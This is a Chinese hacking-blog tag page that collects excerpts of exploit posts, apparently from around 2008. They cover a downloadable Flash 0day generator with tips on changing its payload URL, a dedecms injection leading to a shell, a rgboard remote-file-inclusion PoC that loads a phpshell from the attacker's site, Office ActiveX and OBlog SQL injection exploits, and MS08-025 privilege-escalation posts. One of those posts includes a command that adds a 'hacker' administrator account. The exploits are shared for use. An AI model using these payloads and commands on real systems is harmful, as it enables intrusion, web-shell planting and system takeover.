标签 ‘Exploit’ 下的日志

关于FLASH ODAY的修改方法

鬼仔注:昨天发了open写的Flash 0day生成器,当时忘了说了,是在赏月那里看到的。结果今天open跟我说发出来之后,好多人找他问修改方法,所以就有了现在这篇文章。

来源:open’s blog

鬼仔网站上公布了生成器。在这我就粗略说一下
把那个ODAY的网址改为明文的方法。
以我BLOG所上传的样本为例:
定位到文件的FD位置后。把它改为51
之后的下载网址你想改啥就啥
阅读全文 »

Tags: , , ,

Flash 0day生成器

鬼仔:也就是这个了,open写的。

下载地址:flash0day.rar

Tags: , , , ,

Dedecms getip()的漏洞利用

author: superhei
team:http://www.ph4nt0m.org
blog:http://superhei.blogbus.com

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:

在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php
阅读全文 »

Tags: , ,

rgboard 3.0.12 远程文件包含漏洞

鬼仔:昨天有事出去了下,家里宽带到期了,我竟然不知道,晚上回来之后才发现的,今天去交了费,所以更新没跟上。

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined(‘BBS_LIB_INC_INCLUDED’)) {
define(‘BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

Tags: , , ,

Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit

<!–
The problem is in wkimgsrv.dll module shipped with many MS Offiice
Suite (tested on MS OF 2003,MS OF 2007)
Actually,this is not the case of buffer overflow attack,just a exploit
of insecure method WKsPictureInterface.
Setting this point to any where in memory and IE will crash when
wkiimgsrv’s trying to access an invalid memory location.
阅读全文 »

Tags: , , ,

OBlog Sql Injection Vulnerability

官方已经修正该漏洞。

–==+=================== www.nspcn.org =================+==–
–==+                OBlog (tags.asp) Remote SQL Injection Exploit             +==–
–==+====================================================================================+==–

#Author: Whytt & Tr4c3[at]126[dot]com
#版权所有:http://www.nspcn.org & [BK瞬间群] & Whytt
#漏洞文件tags.asp
阅读全文 »

Tags: , , , , ,

又一个MS08-025

update(2008.5.9):姬良:“这个和网上的不同,这个不是用双引号括住命令,而是用参数-s”

来源:%5C

真正可用的MS08025。
为了多次运行,服务器蓝屏,请直接用一次运行所有的命令
比如:
MS08025 “cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add”

Local Privilege Escalation Vulnerability Exploit(MS08025)

阅读全文 »

Tags: ,

MS08-025 for win2k & win2k3

来源:酒水不犯茶水

Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。

阅读全文 »

Tags: ,